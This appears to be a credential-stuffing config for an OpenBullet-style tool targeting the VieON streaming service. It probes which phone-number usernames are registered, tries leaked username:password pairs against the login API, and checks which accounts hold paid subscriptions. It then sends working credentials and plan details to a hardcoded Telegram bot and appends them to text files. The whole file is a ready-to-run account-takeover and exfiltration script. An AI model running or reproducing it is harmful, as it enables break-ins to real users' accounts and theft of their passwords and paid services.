RandomString $"?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h?h" $"" -> VAR "device_id" 

HttpRequest xNet POST $"https://api.vieon.vn/backend/user/login/anonymous?platform=web&ui=012021" 
  CONTENT $"device_id=<device_id>&model=Windows%2010&platform=web&ui=012021" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER $"Accept: application/json, text/plain, */*" 
  HEADER $"Origin: https://vieon.vn" 
  HEADER $"Referer: https://vieon.vn/" 
  HEADER $"Sec-Ch-Ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER $"Sec-Ch-Ua-Mobile: ?0" 
  HEADER $"Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER $"Sec-Fetch-Dest: empty" 
  HEADER $"Sec-Fetch-Mode: cors" 
  HEADER $"Sec-Fetch-Site: same-site" 
  HEADER $"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 

Parse $"<SOURCE>" JSON $"access_token" -> VAR "access_token" 

HttpRequest xNet POST $"https://api.vieon.vn/backend/user/v2/register?platform=web&ui=012021" 
  CONTENT $"{\"username\":\"<USER>\",\"country_code\":\"VN\",\"model\":\"Windows 10\",\"device_id\":\"<device_id>\",\"device_name\":\"Chrome/120\",\"device_type\":\"desktop\",\"platform\":\"web\",\"ui\":\"012021\"}" 
  CONTENTTYPE "application/json" 
  HEADER $"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 
  HEADER $"Pragma: no-cache" 
  HEADER $"Accept: application/json, text/plain, */*" 
  HEADER $"Authorization: <access_token>" 
  HEADER $"Origin: https://vieon.vn" 
  HEADER $"Sec-Ch-Ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER $"Sec-Ch-Ua-Mobile: ?0" 
  HEADER $"Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER $"Sec-Fetch-Dest: empty" 
  HEADER $"Sec-Fetch-Mode: cors" 
  HEADER $"Sec-Fetch-Site: same-site" 

KeyCheck BanOnToCheck=False 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain $"4009" 

HttpRequest xNet POST $"https://api.vieon.vn/backend/user/v2/login?platform=web&ui=012021" 
  CONTENT $"{\"username\":\"<USER>\",\"password\":\"<PASS>\",\"country_code\":\"VN\",\"model\":\"Windows 10\",\"device_id\":\"<device_id>\",\"device_name\":\"Chrome/120\",\"device_type\":\"desktop\",\"platform\":\"web\",\"ui\":\"012021\"}" 
  CONTENTTYPE "application/json" 
  HEADER $"Accept: application/json, text/plain, */*" 
  HEADER $"Authorization: <access_token>" 
  HEADER $"Origin: https://vieon.vn" 
  HEADER $"Sec-Ch-Ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER $"Sec-Ch-Ua-Mobile: ?0" 
  HEADER $"Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER $"Sec-Fetch-Dest: empty" 
  HEADER $"Sec-Fetch-Mode: cors" 
  HEADER $"Sec-Fetch-Site: same-site" 
  HEADER $"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 

KeyCheck BanOnToCheck=False 
  KEYCHAIN Failure OR 
    KEY $"\"code\":400" 

Parse $"<SOURCE>" JSON $"access_token" -> VAR "access_token" 

HttpRequest xNet GET $"https://api.vieon.vn/backend/billing/purchased-services?platform=web&ui=012021" 
  
  HEADER $"Accept: application/json, text/plain, */*" 
  HEADER $"Authorization: <access_token>" 
  HEADER $"Origin: https://vieon.vn" 
  HEADER $"Referer: https://vieon.vn/ca-nhan/" 
  HEADER $"Sec-Ch-Ua: \"Not_A Brand\";v=\"8\", \"Chromium\";v=\"120\", \"Google Chrome\";v=\"120\"" 
  HEADER $"Sec-Ch-Ua-Mobile: ?0" 
  HEADER $"Sec-Ch-Ua-Platform: \"Windows\"" 
  HEADER $"Sec-Fetch-Dest: empty" 
  HEADER $"Sec-Fetch-Mode: cors" 
  HEADER $"Sec-Fetch-Site: same-site" 
  HEADER $"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" 

Parse $"<SOURCE>" LR $"\"subscription_use\":" $",\"subscription_remain\"" CreateEmpty=False -> CAP "Gói đang dùng" 
  SAFE 

Parse $"<SOURCE>" LR $"\"subscription_remain\":" $",\"subscription_expired" CreateEmpty=False -> CAP "Gói còn lại" 
  SAFE 

KeyCheck BanOnToCheck=False 
  KEYCHAIN Custom "FREE" AND 
    KEY "<Gói đang dùng>" Contains $"\"total\":0" 
    KEY "<Gói còn lại>" Contains $"\"total\":0" 
  KEYCHAIN Success OR 
    KEY "<Gói đang dùng>" DoesNotContain $"\"total\":0" 
    KEY "<Gói còn lại>" DoesNotContain $"\"total\":0" 

#Auto_Hit_telegram TlgSendMessage $"6690631010:AAHC5RDOtXmS5riiQUey5rpofmvyqlpUxQY" $"1407009078" 
  MESSAGE $"<USER>:<PASS> | Gói = <Gói đang dùng> | Date = <Gói còn lại>" -> VAR "Auto Hit" 

#Export_List_sdt FileAppendLines $"Vieon_list_sdt.txt" 
  CONTENT $"<USER>:<PASS>" 

#Export_list_data FileAppendLines $"Export_List_data.txt" 
  CONTENT $"<USER>:<PASS> | Gói = <Gói đang dùng> | Date = <Gói còn lại>" 

